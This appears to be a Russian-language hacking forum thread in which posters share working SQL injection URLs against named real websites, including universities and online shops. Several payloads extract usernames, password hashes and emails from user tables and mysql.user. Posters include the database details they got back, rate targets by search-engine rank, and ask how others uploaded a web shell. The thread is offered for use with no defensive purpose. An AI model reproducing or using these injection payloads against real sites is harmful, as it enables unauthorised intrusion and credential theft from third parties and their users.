SQL Инъекции

Code:

http://gameleader.ru/showfull.php?gameid=-1262%27+union+select+1,2,3,4,version%28%29,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0--+f

 

The Marian Library.

Code:

http://campus.udayton[COLOR=Red].edu[/COLOR]/mary/resources/links/linkdisplay.php3?catnum=1-1+UNION+SELECT+CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--

Database Version: 5.0.41-log
Database name: marylinks
User name: mary@localhost

ТИЦ: 20
PR: 3

Официальный сайт коммерческого игрового движка Blitz3D.

Code:

http://www.blitzbasic.com/codearcs/codearcs.php?code=1-1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8--

Database Version: 5.1.56-log
Database name: blitzbas_db
User name: blitzbas_bman@localhost

ТИЦ: 40
PR: 5

 

Code:

http://www.pocketgpsworld.com/sub-menu.php?idCat=9+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1+--+

 

http://www.emuanime.cl/tienda.php?id=-77'+union+select+1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+wp_users+--+
http://www.donaticus-him.ru/view_product.php?id=-7'+union+select+1,2222,3,4,version()+--+

http://www.clovekvtisni.cz/index2en.php?id=642+and+1=0+union+select+1,concat(email,0x3a,password),3+from+users+--+

http://shadesoptical.com/blog.php?id=-24+union+select+1,concat(login,0x3a,pass),3,4,5,6,7,8,9+from+shades_optical.users+limit+1,1+--+

 

http://www.webgari.com/top/siteinfo.php?count=6154%27+union+select+1,2,3,version%28%29,5,6,7,8,9,0,1,2,3,4--+

 

gomos.org

Яндекс тИЦ (CY) 10
Alexa Rank 1,364,524 -85,214
Google PageRank (PR) 1

 

Code:

http://www.gavailer.ru/sites/index.php?id_site=-82+/*!union+select+1,2*/

 

Code:

http://tv.teletrade.com.ua/index.php?cat=12&subcat=999999.9'+union+all+select+1,concat(0x7e,0x27,unhex(Hex(cast(database()+user()+as+char))),0x27,0x7e),2,3,4,5,6,7+and+'x'='x

^^^^^^^^^
Current User: root@localhost
Это:
http://www.teletrade.com.ua/ 275тиц 6pr
http://masterbrok.com.ua/ 30тиц 4pr
http://www.dengi-info.com/ 600тиц 4pr
http://tv.teletrade.com.ua/ 10тиц 3pr

И plesk бд и mysql included. Наслаждайтесь.

p.s. а я по таким крутым не лажу... вера не позволяет и skills. стремно.
p.s.s. буду благодарен за пару ненулевых сайтов с бубликами женской/детской тематики в приват =)

 

Интересный подзапрос.

Code:

http://www.hawk.ru/foto_gallery.php?id_gal=-27%20union%20select%200x27,0x2D3120756E696F6E2073656C65637420312C636F6E6361745F777328307833622C646174616261736528292C7573657228292C76657273696F6E2829292C332C342C35202D2D2066%20--%20f

 

PR=5

Code:

http://www.wallace.edu/student_resources/pathways/news_full_article.htm?id=-1+union+select+1,concat_ws%280x3a,host,user,password%29,3,4,5,6+from+mysql.user--

DB:

Code:

information_schema
administrator_documents
athletic
career_lab
cie
continuing_ed 
deptpages
distance_ed
drupal
form_data
foundations
helpdesk
inventory
joomla
lrc 
maintenance
mediawiki 
messagebord
misrequest 
mysql
offsitelinks

CY=550 PR=7

Code:

http://www.nd.edu/~ccl/news.php?id=-6+union+select+concat_ws%280x3a,database%28%29,user%28%29,version%28%29%29,2,3,4,5+--+

 

Но комментс

http://www.flb.ru/index_open.php?info_id=-49931/**//*!union*//**//*!select*//**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+&kpk=1

 

_http://www.trooder.com/directory/show.php?id=84015+union+select+1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0,11,12,13,14,15,16,17,18,19+--+

_http://smaa-hq.com/bio.php?bioid=-21+union+select+1,2,version(),4,5,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),7,8,99+--+

_http://www.libonline.ru/index.php?id=833399999999+union+select+1,2,version(),4,5,6,7+--+

 

pro-kinder.com.ua

5.1.50
Яндекс тИЦ (CY) 70
Google PageRank (PR) 3



donbazar.ru

5.1.49-rel11.3-log
Яндекс тИЦ (CY) 10
Google PageRank (PR) 1

 

PR 2

PHP:

http://masscool.com/category.php?pid=125%20union%20select%201,2,concat_ws%280x3a,@@version,user%28%29,database%28%29%29,4,5,6,7,8--

 

PR 3

PHP:

http://wrigroup.ca/index.php?catid=-183%20UNION%20SELECT%20concat_ws%280x3a,username,password,email,accesslevel%29,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29+from+cfaq_admin

 

TIC 350
PR 5

 

[email protected]

ALBERT@LOCALHOST

 

Code:

http://www.robolive.ru/node/post.php?id=-1+union+select+1,2,3,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+15,1

//для вопросов есть другая тема

 

links_vvt@localhost

alexgi_2@localhost

HAXTA4OK:пости в одном посте

 

Тиц - 10
PR - 6

Кто сможет залить шелл отпишитесь как вы это сделали,если не трудно =) просто ради опыта.